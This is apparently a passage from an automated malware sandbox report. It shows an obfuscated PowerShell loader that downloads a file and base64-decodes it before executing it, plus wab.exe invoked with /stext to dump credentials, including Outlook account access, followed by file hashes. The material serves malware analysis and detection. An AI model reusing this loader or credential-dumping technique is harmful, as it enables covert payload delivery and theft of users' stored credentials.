C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes94 'S$ gSlPoAbLaSlb:AS.a tTeSlNl,iSt =T(,T ecs tF- PSa,t.h, N$FPSr,oSg r a mGrmeGdJa kSt rSs )D ') ;Scance (Svndyssendes94 '.$Lg.l o,bha lD:VfRoSrVl i sAe.= $,g lBoSbAa,lV:FSAmOaGa t r.yEk,kse n eP+E+ %a$gSHu.jieHt .ScKoHu n,tH ') ;$Udvandringerne=$Sujet[$forlise];}$Hjsangs=362888;$Destalinising=27100;Scance (Svndyssendes94 'A$.g l oHb a l :SW h i f.fSe rP B=F G e t -DCFo n t,eFnNtW S$ PrrAo gSrHaSm rPe d aTkIt.rPsT ');Scance (Svndyssendes94 'N$og,l.oFbDaTlT:SFPoCr.l iNs E=H F[ S yRs.tce mS.CCPoAn.v eRr,tT] :,:,F r.o m B,aOs,e 6B4 SPtErFi.nOgD(F$ WVh icf fFehr,)L ');Scance (Svndyssendes94 'T$Bg lOo,bVa l :oHAeTbKeCn oGn =R F[.SBy.sPt e m..TT.e.x.t..VESn c.oGd,i n gD],:.:GA S CNIGI,. G eCt,SAt r.i n gG( $ FPo,r lliIsF) ');Scance (Svndyssendes94 'K$,gYlSoDb,a.lB:ODLe sNq uTa mFa tDiCoAn s = $ H.eLbYeHn oSnB.MsruFbMsPt rLiAnBg.( $.Hlj,s aAnSg sA,T$FD eTs tAaGlUi n ips i nugC)R ');Scance $Desquamations;"7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"8⤵PID:100
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rcnlctzbasvcbvmmkdgssrikapklny"5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2980 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\bwsedlkcobnpljaqtostcwdtiduugjdzi"5⤵
- Accesses Microsoft Outlook accounts
PID:632 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\myxwed"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4568
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD5d4d8cef58818612769a698c291ca3b37
SHA154e0a6e0c08723157829cea009ec4fe30bea5c50
SHA25698fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6
-
Filesize
1KB
MD5806286a9ea8981d782ba5872780e6a4c
SHA199fe6f0c1098145a7b60fda68af7e10880f145da
SHA256cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713
SHA512362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e
-
Filesize
26KB
MD57a6e4c385a470b962384797f26bc0b8a
SHA15d4eeeef8961f0ca7a83b5baeb36bb6715d61a11
SHA256b13926e222564a63a3308de6cb116c226e93cd1e9d1b5f2fcac2de6d80e70206
SHA512ba326cbba71bbfd6054a1f3564fcf4c085add37c186170e039e9cf469cdd16b0fd394f028d4d09ea45faadeea4cf5f4edb64f8c5db58eb67ed93987740d8e453
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD560e30555becdb968406edb87fff512ef
SHA165551417f6371c40e6d5dab38fe87ab634f9446e
SHA2569e347aa1a363532c72d7728abe1afdc48b9418fae8cbf8bcbc50c9c22dfefa57
SHA512cbe1aebf171b54f481028208aa85fb04145cc40772cc30e67107caa5cc70c73f274da362766f125093c1fab1416c687744e53e0f7c30b6ead866c6f6ba671449
-
Filesize
463KB
MD594572e00c871082890aa82c378bd11c9
SHA198e0f97730646e0851978b12347c1bf40ef1fab8
SHA256dc5b8030df4f58cda3228e7a321ee9e7a6ec1f29cd167fc50e42b22752766a46
SHA512ab9e446d2480068db588e133aaf9230ba502a92ed63045d9372a1c9ff9059c2c49a58d55235aa01a32bfe9a1b836c481967fbe95077da96643b3a3144161f650
-
Filesize
507KB
MD5047e0275bdd0927f6efef87097f21863
SHA14299854e50da9bf541fa2860dd03b635d7dfba47
SHA256e0e516ea98d02bc1529767d9c3524b6ec48342af2c5a704ce976d5f2430df1c2
SHA512b094d60e78b9fd9c230bf53774ba3853321a37be02174844b7b6b39b977641438310a14267a26977f4c88db45e52ae5e6f0f98ebb74d8466e960fd1b958574e3